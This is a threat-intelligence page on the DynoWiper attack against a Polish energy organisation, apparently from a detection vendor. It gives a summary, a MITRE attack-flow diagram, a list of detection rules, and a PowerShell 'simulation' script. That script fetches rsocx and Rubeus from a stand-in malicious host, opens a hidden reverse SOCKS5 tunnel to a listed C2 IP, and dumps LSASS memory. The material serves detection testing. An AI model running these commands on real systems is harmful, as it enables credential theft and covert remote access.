Follow
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
DynoWiper is a destructive wiper used against an energy-sector organization in Poland, impacting multiple endpoints across operations. The executables were staged in a shared network location and launched directly from that share. ESET attributes the activity to Sandworm with medium confidence. Once executed, the malware corrupts targeted files with random bytes and triggers a forced reboot to complete the impact.
Investigation
ESET recovered three samples—schtask.exe, schtask2.exe, and _update.exe—dropped under C:\inetpub\pub. Embedded PDB paths suggest the binaries were compiled in a Vagrant environment. Reverse engineering showed a three-step wiping routine, with two variants inserting a five-second sleep between phases. Post-compromise artifacts also included the Kerberos tool Rubeus and an rsocx SOCKS5 proxy inside the victim network.
Mitigation
ESET PROTECT on the victim systems blocked all three variants, limiting damage. Reduce exposure by preventing unauthorized scheduled-task creation and monitoring for unexpected writes into shared directories. Add application allow-listing and disallow execution from network shares wherever possible.
Response
Identify and isolate hosts that run schtask.exe, schtask2.exe, or *_update.exe from a share. Preserve volatile evidence, review scheduled tasks and PowerShell deployment traces, and remove tools such as Rubeus and rsocx. Complete full forensics and restore data from verified clean backups.
"graph TB %% Class definitions classDef technique fill:#ffcc99 classDef tool fill:#c2f0c2 classDef action fill:#99ccff classDef malware fill:#ffd699 %% Nodes action_ingress["<b>Action</b> – <b>T1105 Ingress Tool Transfer</b><br/><b>Description</b>: Downloaded additional tools such as Rubeus.exe and rsocx into the compromised environment."] class action_ingress technique tool_rubeus["<b>Tool</b> – <b>Name</b>: Rubeus.exe<br/><b>Description</b>: Performs Kerberos credential theft and abuse."] class tool_rubeus tool tool_rsocx["<b>Tool</b> – <b>Name</b>: rsocx<br/><b>Description</b>: SOCKS5 proxy used to relay C2 traffic."] class tool_rsocx tool action_cred_dump["<b>Action</b> – <b>T1003.001 LSASS Memory</b><br/><b>Description</b>: Dumped LSASS process memory via Task Manager to obtain credentials."] class action_cred_dump technique action_powershell["<b>Action</b> – <b>T1059.001 PowerShell</b><br/><b>Description</b>: Executed PowerShell scripts to deploy malicious binaries and facilitate further actions."] class action_powershell technique action_cmd["<b>Action</b> – <b>T1059.003 Windows Command Shell</b><br/><b>Description</b>: Used cmd.exe to run shell commands and orchestrate the wiper."] class action_cmd technique action_gpo_discovery["<b>Action</b> – <b>T1615 Group Policy Discovery</b><br/><b>Description</b>: Identified Group Policy Objects to prepare for wide scale deployment."] class action_gpo_discovery technique action_gpo_modify["<b>Action</b> – <b>T1484 Domain or Tenant Policy Modification</b><br/><b>Description</b>: Modified GPOs to distribute DynoWiper binary across the domain."] class action_gpo_modify technique action_schtask["<b>Action</b> – <b>T1053 Scheduled Task Job</b><br/><b>Description</b>: Created scheduled tasks with schtask.exe to persist wiper execution."] class action_schtask technique action_data_removable["<b>Action</b> – <b>T1025 Data from Removable Media</b><br/><b>Description</b>: Placed tools and the wiper in a shared network directory C:\inetpub\pub\."] class action_data_removable technique action_file_discovery["<b>Action</b> – <b>T1083 File Directory Discovery</b><br/><b>Description</b>: Enumerated files and directories on fixed and removable drives while excluding system folders."] class action_file_discovery technique action_wipe["<b>Action</b> – <b>T1561.001 Disk Content Wipe</b><br/><b>Description</b>: Overwrote file contents with random data deleting or corrupting data."] class action_wipe technique action_reboot["<b>Action</b> – <b>T1529 System Shutdown Reboot</b><br/><b>Description</b>: Forced system reboot after wiping to finalize destruction."] class action_reboot technique action_proxy["<b>Action</b> – <b>T1090.002 External Proxy</b><br/><b>Description</b>: Configured rsocx to use external SOCKS5 proxy 31.172.71.5:8008 to hide C2 traffic."] class action_proxy technique malware_dyno["<b>Malware</b> – <b>Name</b>: DynoWiper<br/><b>Description</b>: Wiper payload that overwrites data and triggers reboot."] class malware_dyno malware %% Connections action_ingress –>|downloads| tool_rubeus action_ingress –>|downloads| tool_rsocx tool_rubeus –>|enables| action_cred_dump tool_rsocx –>|provides| action_proxy action_cred_dump –>|provides credentials for| action_powershell action_powershell –>|executes| action_cmd action_cmd –>|orchestrates| action_wipe action_gpo_discovery –>|leads to| action_gpo_modify action_gpo_modify –>|distributes| malware_dyno action_schtask –>|creates task for| malware_dyno action_data_removable –>|stores| tool_rubeus action_data_removable –>|stores| tool_rsocx action_data_removable –>|stores| malware_dyno malware_dyno –>|performs| action_file_discovery malware_dyno –>|performs| action_wipe action_wipe –>|triggers| action_reboot action_proxy –>|relays traffic for| malware_dyno "
Attack Flow
Detections
Potential Malware Self-Removal or Stderr Concealment Operation (via cmdline)
View
Shutdown Used For Forcing a System Halt or Reboot (via cmdline)
View
IOCs (HashSha1) to detect: ESET Research DynoWiper update: Technical analysis and attribution
View
IOCs (SourceIP) to detect: ESET Research DynoWiper update: Technical analysis and attribution
View
IOCs (DestinationIP) to detect: ESET Research DynoWiper update: Technical analysis and attribution
View
Detection of DynoWiper Deployment via Scheduled Task Execution [Windows File Event]
View
Detection of Malicious Tools and LSASS Memory Dumping [Windows Process Creation]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
-
Attack Narrative & Commands:
- Establish a reverse SOCKS5 proxy using
rsocx.exe. The adversary downloads the binary from an external server, places it in%TEMP%, and runs it with the-r 31.172.71.5:8008argument to create a reverse tunnel back to the C2 host. - Perform Kerberos ticket abuse with
rubeus.exe. The tool is executed to request a Kerberos ticket‑granting ticket (TGT) for the domain admin account and subsequently forge a service ticket (s4u2self). - Dump LSASS memory using
procdump.exe(a common alternative to Task Manager) to capture credential material. Sysmon records a Process Access event where the attacker’sprocdump.exeprocess accesseslsass.exewith the0x1010granted access mask (PROCESS_VM_READ | PROCESS_QUERY_INFORMATION).
- Establish a reverse SOCKS5 proxy using
-
Regression Test Script:
# ------------------------------------------------------------- # Simulation script – triggers the Sigma rule for rsocx, rubeus, # and LSASS dump. Run with administrative privileges. # ------------------------------------------------------------- # 1. Deploy rsocx.exe (reverse SOCKS5 proxy) $rsocxPath = "$env:TEMPrsocx.exe" Invoke-WebRequest -Uri "http://malicious.example.com/rsocx.exe" -OutFile $rsocxPath Start-Process -FilePath $rsocxPath -ArgumentList "-r 31.172.71.5:8008" -WindowStyle Hidden # 2. Deploy rubeus.exe (Kerberos abuse) $rubeusPath = "$env:TEMPrubeus.exe" Invoke-WebRequest -Uri "http://malicious.example.com/rubeus.exe" -OutFile $rubeusPath Start-Process -FilePath $rubeusPath -ArgumentList "dump /service:krbtgt" -WindowStyle Hidden # 3. Dump LSASS using procdump (requires Sysinternals) $procdumpPath = "$env:TEMPprocdump.exe" Invoke-WebRequest -Uri "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMPprocdump.zip" Expand-Archive -Path "$env:TEMPprocdump.zip" -DestinationPath $env:TEMP -Force $procdumpExe = Get-ChildItem "$env:TEMP" -Recurse -Filter "procdump.exe" | Select-Object -First 1 if ($procdumpExe) { Copy-Item $procdumpExe.FullName $procdumpPath -Force Start-Process -FilePath $procdumpPath -ArgumentList "-ma lsass.exe $env:TEMPlsass.dmp" -Wait } Write-Host "Simulation completed. Check SIEM for alerts." -
Cleanup Commands:
# Terminate any lingering malicious processes Get-Process -Name "rsocx","rubeus","procdump" -ErrorAction SilentlyContinue | Stop-Process -Force # Remove binaries and dump files Remove-Item -Path "$env:TEMPrsocx.exe","$env:TEMPrubeus.exe","$env:TEMPprocdump.exe","$env:TEMPlsass.dmp" -Force -ErrorAction SilentlyContinue # Optionally delete temporary download directories Remove-Item -Path "$env:TEMPProcdump.zip","$env:TEMPprocdump" -Recurse -Force -ErrorAction SilentlyContinue Write-Host "Cleanup finished."